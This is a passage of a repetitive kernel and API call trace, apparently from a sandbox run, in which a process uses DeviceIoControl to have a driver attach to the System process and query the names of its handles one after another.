ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed6f20, HandleInformation=0x0) returned 0x0 [0118.840] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.840] PsReleaseProcessExitSynchronization () returned 0x2 [0118.840] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.840] ObQueryNameString (in: Object=0xfffffa8001ed6f20, ObjectNameInfo=0xfffffa80028856c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028856c4, ReturnLength=0xfffff88005163550) returned 0x0 [0118.840] ObfDereferenceObject (Object=0xfffffa8001ed6f20) returned 0x2 [0118.840] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.840] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.840] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.840] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.840] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.840] PsAcquireProcessExitSynchronization () returned 0x0 [0118.840] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.841] ObReferenceObjectByHandle (in: Handle=0xffffffff80000628, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f91350, HandleInformation=0x0) returned 0x0 [0118.841] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.841] PsReleaseProcessExitSynchronization () returned 0x2 [0118.841] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.841] ObQueryNameString (in: Object=0xfffffa8001f91350, ObjectNameInfo=0xfffffa800288b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288b044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.841] ObfDereferenceObject (Object=0xfffffa8001f91350) returned 0x2 [0118.841] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.841] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.841] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.841] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.841] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.841] PsAcquireProcessExitSynchronization () returned 0x0 [0118.841] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.841] ObReferenceObjectByHandle (in: Handle=0xffffffff80000630, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f92680, HandleInformation=0x0) returned 0x0 [0118.841] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.842] PsReleaseProcessExitSynchronization () returned 0x2 [0118.842] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.842] ObQueryNameString (in: Object=0xfffffa8001f92680, ObjectNameInfo=0xfffffa800288e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288e044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.842] ObfDereferenceObject (Object=0xfffffa8001f92680) returned 0x2 [0118.842] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.842] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.842] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.842] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.842] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.842] PsAcquireProcessExitSynchronization () returned 0x0 [0118.842] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.842] ObReferenceObjectByHandle (in: Handle=0xffffffff80000634, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed57c0, HandleInformation=0x0) returned 0x0 [0118.842] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.842] PsReleaseProcessExitSynchronization () returned 0x2 [0118.842] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.842] ObQueryNameString (in: Object=0xfffffa8001ed57c0, ObjectNameInfo=0xfffffa8002891044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002891044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.842] ObfDereferenceObject (Object=0xfffffa8001ed57c0) returned 0x2 [0118.842] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.842] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.842] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.842] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.842] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.842] PsAcquireProcessExitSynchronization () returned 0x0 [0118.842] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.843] ObReferenceObjectByHandle (in: Handle=0xffffffff80000638, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f91af0, HandleInformation=0x0) returned 0x0 [0118.843] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.843] PsReleaseProcessExitSynchronization () returned 0x2 [0118.843] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.843] ObQueryNameString (in: Object=0xfffffa8001f91af0, ObjectNameInfo=0xfffffa800288a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288a044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.843] ObfDereferenceObject (Object=0xfffffa8001f91af0) returned 0x2 [0118.843] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.843] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.843] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.843] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.843] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.843] PsAcquireProcessExitSynchronization () returned 0x0 [0118.843] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.843] ObReferenceObjectByHandle (in: Handle=0xffffffff8000063c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a4ebc0, HandleInformation=0x0) returned 0x0 [0118.843] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.843] PsReleaseProcessExitSynchronization () returned 0x2 [0118.843] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.843] ObQueryNameString (in: Object=0xfffffa8003a4ebc0, ObjectNameInfo=0xfffffa800288f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800288f044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.843] ObfDereferenceObject (Object=0xfffffa8003a4ebc0) returned 0x2 [0118.843] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.843] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.843] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.844] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.844] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.844] PsAcquireProcessExitSynchronization () returned 0x0 [0118.844] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.844] ObReferenceObjectByHandle (in: Handle=0xffffffff80000640, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f91550, HandleInformation=0x0) returned 0x0 [0118.844] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.844] PsReleaseProcessExitSynchronization () returned 0x2 [0118.844] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.844] ObQueryNameString (in: Object=0xfffffa8001f91550, ObjectNameInfo=0xfffffa8002892044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002892044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.844] ObfDereferenceObject (Object=0xfffffa8001f91550) returned 0x2 [0118.844] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.844] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.844] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.844] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.844] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.844] PsAcquireProcessExitSynchronization () returned 0x0 [0118.844] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.844] ObReferenceObjectByHandle (in: Handle=0xffffffff80000644, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ed5e50, HandleInformation=0x0) returned 0x0 [0118.844] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.844] PsReleaseProcessExitSynchronization () returned 0x2 [0118.844] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.844] ObQueryNameString (in: Object=0xfffffa8001ed5e50, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.845] ObfDereferenceObject (Object=0xfffffa8001ed5e50) returned 0x2 [0118.845] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.845] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.845] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.845] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0118.845] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.845] PsAcquireProcessExitSynchronization () returned 0x0 [0118.845] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.845] ObReferenceObjectByHandle (in: Handle=0xffffffff80000648, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f90860, HandleInformation=0x0) returned 0x0 [0118.845] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.845] PsReleaseProcessExitSynchronization () returned 0x2 [0118.845] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.845] ObQueryNameString (in: Object=0xfffffa8001f90860, ObjectNameInfo=0xfffffa8002888044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002888044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.845] ObfDereferenceObject (Object=0xfffffa8001f90860) returned 0x2 [0118.845] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.845] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.845] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.845] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0118.845] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.845] PsAcquireProcessExitSynchronization () returned 0x0 [0118.845] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.845] ObReferenceObjectByHandle (in: Handle=0xffffffff8000064c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a18d00, HandleInformation=0x0) returned 0x0 [0118.846] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.846] PsReleaseProcessExitSynchronization () returned 0x2 [0118.846] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.846] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002889044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002889044, ReturnLength=0xfffff88005163508) returned 0x0 [0118.846] ObfDereferenceObject (Object=0xfffffa8003a18d00) returned 0x1 [0118.846] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.846] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.846] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.846] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0118.846] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.846] PsAcquireProcessExitSynchronization () returned 0x0 [0118.846] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.846] ObReferenceObjectByHandle (in: Handle=0xffffffff80000650, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f902c0, HandleInformation=0x0) returned 0x0 [0118.846] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.846] PsReleaseProcessExitSynchronization () returned 0x2 [0118.846] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.846] ObQueryNameString (in: Object=0xfffffa8001f902c0, ObjectNameInfo=0xfffffa8002894044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002894044, ReturnLength=0xfffff88005163550) returned 0x0 [0118.846] ObfDereferenceObject (Object=0xfffffa8001f902c0) returned 0x2 [0118.846] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0118.846] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0118.846] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0118.846] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0118.847] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0118.847] PsAcquireProcessExitSynchronization () returned 0x0 [0118.847] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0118.847] ObReferenceObjectByHandle (in: Handle=0xffffffff80000654, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002631ab0, HandleInformation=0x0) returned 0x0 [0118.847] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0118.847] PsReleaseProcessExitSynchronization () returned 0x2 [0118.847] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0118.847] ObQueryNameString (in: Object=0xfffffa8002631ab0, ObjectNameInfo=0xfffffa8002895044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002895044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.519] ObfDereferenceObject (Object=0xfffffa8002631ab0) returned 0x0 [0119.519] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.519] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.529] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.529] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.529] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.529] PsAcquireProcessExitSynchronization () returned 0x0 [0119.538] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.538] ObReferenceObjectByHandle (in: Handle=0xffffffff80000658, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8f660, HandleInformation=0x0) returned 0x0 [0119.538] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.538] PsReleaseProcessExitSynchronization () returned 0x2 [0119.538] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.547] ObQueryNameString (in: Object=0xfffffa8001f8f660, ObjectNameInfo=0xfffffa800290a044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290a044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.548] ObfDereferenceObject (Object=0xfffffa8001f8f660) returned 0x2 [0119.548] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.557] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.557] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.557] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.557] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.557] PsAcquireProcessExitSynchronization () returned 0x0 [0119.557] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.557] ObReferenceObjectByHandle (in: Handle=0xffffffff80000660, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f90050, HandleInformation=0x0) returned 0x0 [0119.557] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.557] PsReleaseProcessExitSynchronization () returned 0x2 [0119.557] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.557] ObQueryNameString (in: Object=0xfffffa8001f90050, ObjectNameInfo=0xfffffa8002907044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002907044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.557] ObfDereferenceObject (Object=0xfffffa8001f90050) returned 0x2 [0119.557] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.557] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.557] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.557] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0119.557] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.557] PsAcquireProcessExitSynchronization () returned 0x0 [0119.557] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.558] ObReferenceObjectByHandle (in: Handle=0xffffffff80000668, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001f8e590, HandleInformation=0x0) returned 0x0 [0119.558] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.558] PsReleaseProcessExitSynchronization () returned 0x2 [0119.558] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.558] ObQueryNameString (in: Object=0xfffffa8001f8e590, ObjectNameInfo=0xfffffa8002908044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002908044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.558] ObfDereferenceObject (Object=0xfffffa8001f8e590) returned 0x2 [0119.558] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.558] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0119.558] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0119.558] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0119.558] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0119.558] PsAcquireProcessExitSynchronization () returned 0x0 [0119.558] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0119.558] ObReferenceObjectByHandle (in: Handle=0xffffffff8000066c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001ecf400, HandleInformation=0x0) returned 0x0 [0119.558] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0119.558] PsReleaseProcessExitSynchronization () returned 0x2 [0119.558] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0119.558] ObQueryNameString (in: Object=0xfffffa8001ecf400, ObjectNameInfo=0xfffffa800290b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800290b044, ReturnLength=0xfffff88005163550) returned 0x0 [0119.558] ObfDereferenceObject (Object=0xfffffa8001ecf400) returned 0x2 [0119.558] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0119.558] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: 